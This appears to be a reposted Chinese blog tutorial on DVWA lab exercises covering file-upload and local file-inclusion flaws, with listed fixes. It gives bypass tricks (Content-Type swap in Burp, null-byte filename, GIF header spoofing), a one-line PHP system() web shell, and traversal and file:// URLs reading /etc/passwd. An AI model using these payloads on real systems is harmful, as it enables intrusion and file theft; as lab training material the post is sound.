檔案上傳漏洞修復
1. 檔案mime 型別過濾
2. 檔案大小過濾
3. 檔案型別過濾
4. 獲取影像資訊檢測
使用dvwa 測驗
1. low級別 沒有做過濾可以直接上傳php檔案,
2. 在medium 級別對上傳檔案的mine 型別進行了白名單過濾,我們可以通過brupsuite 改包實作上傳
修改資料包Content-Type: application/x-php 為 Content-Type: image/jpeg
3. 在 high 級別中 增加了,型別檢測,getimagesize獲取影像資訊檢測
php5.4 以下 可以使用檔案名 1.php%00.jpg 進行繞過
php5.4 以上 需要組態檔包含漏洞進行滲透
方法一:
繞過方式,在圖片檔案后面 追加 惡意代碼
由于無法使用菜刀等,一般該級別可以使用php的 system 函式
<?php @system($_POST[caibao])?> # 該命令需要使用post 提交資料
上傳之后需要找到檔案保存的絕對路徑,以及存在的 檔案包含漏洞
方法二:
使用GIF98A 放在檔案首行,宣告該檔案是圖片格式
檔案包含漏洞
檔案包含漏洞是由于php呼叫本地檔案產生的
low 級別 未設定過濾,可使用file 查看系統任意檔案
使用 相對路徑獲取資料
http://192.168.140.131/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd
使用絕對路徑獲取資料
http://192.168.140.131/dvwa/vulnerabilities/fi/?page=file:///etc/passwd
medium 級別對url 已經 相對路徑做了過濾,可以使用file 協議進行繞過(與low 絕對路徑方法相同)
high級別 使用白名單過濾只可以訪問include.php 以及file 開頭的檔案,而file協議剛好也是file開頭 即可正常繞過
impossible 級別設定了更嚴謹的白名單
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/14023.html
標籤:其他
上一篇:IMX6ULL 修改mtdparts磁區問題?求求大家幫忙答疑一下
下一篇:Unity場景打光